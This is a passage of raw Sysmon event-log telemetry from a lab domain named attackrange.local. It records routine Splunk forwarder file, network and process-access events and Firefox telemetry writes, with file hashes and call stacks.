Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=120313C5BA1726B9EBF50714C3B5098D,SHA256=D98ED148A933491BB73EBD3C2E3E9A82E100EF1213E84D21C6462897137F2830,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:34.782{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51149-false10.0.1.12-8000- 23542300x80000000000000001052124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:42.463{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3C7F364E10047AE8219B04D062B36A9,SHA256=BE830823FE683F512E1129291B60B44CAC436F4B5BAF8FD74041F0E25947F200,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:42.511{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9257BF1ACEA6852F85A1CE6B104AE24,SHA256=4A24299ADCB524EB21E6C4D489C2CA42E81D1EBD604F06F3B030878E73C3A18D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:43.527{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF6838013EF6F511B7AB1826537434E0,SHA256=AE21E5EB98D95C9A5067E7B63F03FE576ACE76BFDE595EC44438CD04B39176FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9577C816601E411A805BFDFABC088669,SHA256=1F94CAA34119F74F9941AC2C49F290D458A879B898B866F197188017229D9FC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C3B480FC25577705D748CFF239B784B6,SHA256=537C991CD0D33510E70CD228D68FF347A8FAE6655F95389EDE5FBF1168C7ABF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F6648DD84B7F9266F42A6056039AF765,SHA256=C15DBEC621FAE9C3E571E96A77A93EAB618A32D16921A7946C83AB9E0B485ABA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2907D6BF6644DED9F15FCF991CFB258D,SHA256=AE72118D73F0753E990AC0DA5783C88B73A5583A0D255A7A72BA16C8C4E50817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F605C198571B207C7BF437C3DC364E13,SHA256=6AAC0232859E7CD99722BCE09714E25C196A842285BF1069EF9B863C7E94BDE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BDBDABF57D17F180829C363D707C4F39,SHA256=DAEB9FDC40EFB5D0B94D86CD36F67A74EE3B47495D570F6F36BA47C5570A5DC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=904DBA71FF07C9F49423E6AFA5D26E08,SHA256=4C394BB4BD42B35F7FBDC176C3D69AE8471DACEF441A193F628353F8E6D3A2A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5B079AB26F4AFC22CA97A41F9494AAE4,SHA256=0B83B628502385324CE3B05D1EF6415D4C9B248554AF5104E88D2A082C737038,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=29D26A6719BF924EE33BA616FBCB1D38,SHA256=67CBD60C05BEB5748A1A0BDCD4EC0DA02CD3E72ED12ED65BD60C4FD6BA4BC4F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9F0EDCDFC7570E41DA2CE289CC22D260,SHA256=44B2E246250CB87E87DB65676D14F3AE2D1F7C91CF04A0CF0F074B74977A07BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C0ABD7F46371828E094B60FFFA4D7B69,SHA256=91D482D20232CB07B56177FCD14AAEA79792485C219C3F2A0536B7ED4187E541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.479{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A8868B770219391F84D7D8077F56A6D,SHA256=ED305CE1EDF8676DCC3F0C2A92B3FA44D75D56BA4814B133D1220D4A7E5D0648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:44.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A798991371413A7EB8C59F4FF4E76233,SHA256=7B4DF8E48EA53BDF1009C5633739580A1F0740C2D3A7942A781CAE38EAC8918F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:44.500{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B38F8AA7798ACE9D3854389394550D7C,SHA256=E882B3437E5E5A249AE58693393D6638E02E0DFD2235683D5569DCB5627A90AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:44.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EDD00ECA18B7C0D84984D79A8D33DF69,SHA256=7025232E94F8A4E5B9CD8AA0A15B5496777938ED243758A61B21161BEAB47DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:44.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8747C465A75458984FE2E5A23E2AD370,SHA256=308C3A1CF4CE39501919F5BB03B879F20F8C2395F1B3772AB0A870028C37AF9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:45.516{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B599F824112F14AF51B5E54C7AB2CF5E,SHA256=D48F6BB853AFFBA69F729CBD7ECA8B47974C4AA6959CBA8594836A9271FFCB14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:45.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F57A0464DC1BD4561A5154501001CA,SHA256=DCD67389444C6A2E6375EBF582AB59BA322E40168D49CE02DF80912474DA7EDA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:44.269{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57373-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:46.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7149CB9DF9BEEE2EF63E6768CD5DCC16,SHA256=987C302DDDC7A97055ABB10DD88FF87B62AFE621E207DA663750512522FF06BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:46.517{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1B1A813036E178C1898630E87250EEA,SHA256=DAA159308285F8ED3867ED64A536D955968923F9806CD0D38574277BFF47974B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:47.605{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCFFB0B0FD65C8611A4E1572504BEB09,SHA256=9AEF0CA3F93E67A2FE3A6677847D6C8AEA4D56A1092A7164882EF94469A0291D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:47.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=398E0B8AAABC9140CF67720FA37DF174,SHA256=22493AA970B165996ACCC48C4EDB39020797C336EE5B134FD608C797E364BF45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:48.605{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E19D0BB00BA2AD496DF322B58BD1B0C8,SHA256=863B5E03CD8F7F257BDDFA28BB97DA4E0BF655A0445B4D4229760510BABE6DBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:40.713{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51150-false10.0.1.12-8000- 23542300x80000000000000001052144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:48.549{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E00EC99178C721E58A93C8E67107F94,SHA256=FD0D5157BC81E28A36D2F1270A2D4811B7F0E3A2A409B6AF5DA47FACC32593D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:49.652{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E7B48EF81383D3BAFDC2CB04CFB423E,SHA256=54F745011896724B7E06EF0F7502E54A0FB025C2D1C87E80092CCE901554EF7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:49.579{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17BDFCCE6881AA801B4050AD716F0C6C,SHA256=486E217C0A5811184D7D9245E41261E0EEDE97786471C87988BCCED7C4FFEECD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B2-60EB-A37D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F6B2-60EB-A37D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B2-60EB-A37D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.950{466BC892-F6B2-60EB-A37D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.580{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF61212A7207128B1F902547DE2E85C2,SHA256=A357054C213AF7857D1A7E7B9DEA7326AF5768D318289FE1073E1156D9F78BB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:50.668{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91DC38B35EB51A7B7C841F2557FEBC71,SHA256=504F8E0CF48A1F61AE34748A7384619CC772BAAFBAEBC4D46E5E5097E0ED11DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B2-60EB-A27D-00000000CF01}8104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 